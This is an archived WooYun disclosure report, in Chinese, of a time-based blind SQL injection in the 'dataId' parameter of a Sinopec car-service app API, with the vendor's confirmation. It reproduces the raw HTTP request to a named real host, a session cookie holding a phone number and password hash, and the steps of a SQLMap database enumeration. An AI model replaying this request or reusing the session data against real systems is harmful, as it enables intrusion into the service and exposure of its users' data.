乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-23: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
中石化APP之SQL注入
目标:中石化“车e族”APP扫描检测发现以下地方存在SQL注入:(POST中的dataId,时间盲注)
POST /api/comment/commentapplist HTTP/1.1Content-Length: 200Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://e.o2obest.cn/api/comment/commentapplistCookie: ff911a88cc5c46ac9185aa1e2d241864%3D82f2ba74b46e3ae60ec55fac85f4d775d00f6e07a%3A4%3A%7Bi%3A0%3Bs%3A11%3A%2218000000000%22%3Bi%3A1%3Bs%3A11%3A%2218000000000%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A6%3A%22689472%22%3Bs%3A4%3A%22name%22%3Bs%3A19%3A%22cy_1445582464_20034%22%3Bs%3A4%3A%22user%22%3Ba%3A17%3A%7Bs%3A6%3A%22userId%22%3Bs%3A6%3A%22689472%22%3Bs%3A4%3A%22name%22%3Bs%3A19%3A%22cy_1445582464_20034%22%3Bs%3A3%3A%22pwd%22%3Bs%3A32%3A%226267df2c218b8439a7b72d038833fd65%22%3Bs%3A3%3A%22mob%22%3Bs%3A11%3A%2218002512025%22%3Bs%3A5%3A%22alias%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22imgKey%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%220%22%3Bs%3A7%3A%22addTime%22%3Bs%3A19%3A%222015-10-23%2B14%3A41%3A04%22%3Bs%3A7%3A%22modTime%22%3Bs%3A19%3A%222015-10-23%2B14%3A41%3A04%22%3Bs%3A5%3A%22email%22%3Bs%3A29%3A%22cy_1445582464_20034%40huaat.net%22%3Bs%3A9%3A%22loginTime%22%3Bs%3A19%3A%222015-10-23%2B14%3A41%3A05%22%3Bs%3A4%3A%22type%22%3Bs%3A1%3A%220%22%3Bs%3A9%3A%22companyId%22%3Bs%3A1%3A%220%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%220%22%3Bs%3A11%3A%22deviceToken%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22modPwdTime%22%3Bs%3A19%3A%220000-00-00%2B00%3A00%3A00%22%3Bs%3A4%3A%22role%22%3Bs%3A1%3A%220%22%3B%7D%7D%7D%3B%20USERSESSID%3D1c77bb9dddde1a94319042e526b25b27Host: e.o2obest.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*ajax=1&companyKey=874d8c821358a5e26f2524b10f43a292&dataId=b3952f0658714ffb5d0cc7a353d593c3&https=0
放SQLMap中:1、漏洞证明
2、当前用户
3、共9个数据库,当前库为:server_shuchuang
4、不妨列下server_shuchuang数据库的表,共395个,太卡了,就不一一跑了
服务器有点卡啊,--time-sec从2s到18s……
请多指教
危害等级:中
漏洞Rank:10
确认时间:2015-10-26 17:47
谢谢!我们将尽快修改。
暂无